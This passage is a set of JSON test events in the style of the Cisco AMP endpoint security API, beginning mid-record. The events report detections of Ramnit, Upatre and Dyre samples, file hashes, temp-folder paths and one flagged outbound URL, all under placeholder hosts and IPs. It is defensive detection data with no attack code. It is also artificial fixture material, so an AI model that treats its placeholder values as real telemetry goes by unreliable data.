Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671496","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663807451562000,"timestamp":1610704833,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663807451561998","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://sovereutilizeignty.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":835000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265345","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":918000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":871000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":824000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704197","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":793000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704196","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":684000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704195","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":704000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594701","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":611000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594700","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707312705798000,"timestamp":1610704830,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:00:30+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1264,"scanned_processes":21,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899742001000,"timestamp":1610704828,"timestamp_nanoseconds":742000000,"date":"2021-01-15T10:00:28+00:00","event_type":"Microsoft Word compromise","event_type_id":1107296262,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704828,"start_date":"2021-01-15T10:00:28+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"caee8a2c599ad6e46ffdec5fabadc438af5c2ae5266d2c1e120269fffda6e426"},"parent":{"disposition":"Clean","identity":{"sha256":"b4234acf96fbe0e0feca317a1928afac05105b73556990d89f8a18563e1a3c65"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":589000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180331452157132817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":495000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132816","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":339000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132815","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132814","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132813","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132812","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132811","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} 